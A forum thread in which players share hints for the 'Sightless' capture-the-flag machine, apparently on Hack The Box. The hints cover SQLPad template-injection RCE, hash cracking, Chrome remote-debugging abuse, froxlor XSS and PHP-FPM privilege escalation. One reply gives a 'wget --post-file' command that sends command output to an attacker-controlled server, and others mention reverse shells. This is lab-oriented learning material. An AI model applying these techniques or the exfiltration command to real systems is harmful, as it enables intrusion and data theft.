Let’s talk about Sightless. Please do not share any flags or writeups.
1. Initial Foothold: Examine the vulnerability at this link: Huntr Bounty 46630727
2. Docker Escape: Crack specific hashes to escape the Docker container.
3. Enumeration: Inspect local processes and listening ports and notice Chrome-Remote-Debugging. By exploiting it, get admin credentials for the froxlor service.
4. Getting Root: Once you have logged into the froxlor dashboard, you can execute commands as root by playing with PHP-FPM settings.
These are general hints for the challenge. To not spoil the fun, I did not include exact commands or steps to solve the challenge. If you need more specific hints, feel free to ask.
- SQLPad template injection to RCE to get access to the Docker container
- Crack the hash for the user found in the shadow file
- admin.sightless.htb running on 8080
- Port forward to access the vhost
- Intended (XSS to get credentials)
- (Unintended) use the Metasploit Chrome debugger module to read /home/John/automation/administration.py for credentials
- (Again unintended) port forward all the larger ports, Chrome debugging and check the network; if the session is preserved you’ll get the credentials
- For root: reset the FTP creds, log in and find database.kbd, crack the password and find SSH keys
- Or you can use PHP-FPM to read root.text or to get a shell
This is more than enough.
@Hex feel free to remove if it violates any rules.
I’ve got the KeePass, and managed to open it. The entry in the backup isn’t working though… It isn’t a key; but it doesn’t work as a password.
Edit: nvm. I got it.
This they call an easy machine…
Would you rate it as an easy machine for someone with just basic knowledge of scanning using gobuster, ffuf and nmap?
It is not Easy for a brand-new beginner.
And now the key doesn’t want to work… far out
I’m trying RCE in the database form but it was not successful; I got ECONNREFUSED. Any hint?
I had a lot of trouble getting a shell from the form alone. Spin up a webserver that can accept POST requests; then you can
<CMD> > /path/to/file && wget --post-file=/path/to/file http://<YOUR SERVER>
That will eventually give you enough info to get user.
How do you guys discover the port for initial access? The basic MySQL port gets refused.
You mean to get a reverse shell?
Yes, I’ve changed the command in the database form field to a rev shell with bin/bash, but I always get connection refused in the new connection tab.
You are just providing detailed hints, so it’s not a problem unless you are sharing flags.
I am not sure if XSS for credentials is an intended path, because they literally created Chrome remote debuggers, which is not the default. You might be getting credentials via XSS because people who obtain credentials via Chrome debuggers trigger the XSS, leading to valid cookies.
Someone who has a private instance could verify this.
Actually you can use this: Blind XSS Leading to Froxlor Application Compromise · Advisory · froxlor/Froxlor · GitHub
With XSS you can’t get the creds, but you can create a new user.
It might be. Maybe these Chrome instances are for simulating XSS. Connecting to a remote Chrome instance was a unique experience though.
New user registration is possible; I’ve tested it.
Hey, how did you all get the admin page in Sightless? I tried gobuster, subdomains, vhost, ffuf but couldn’t get any hits…
I have the same question
If you are confused about the server and port, just start a listener or server locally and provide that address.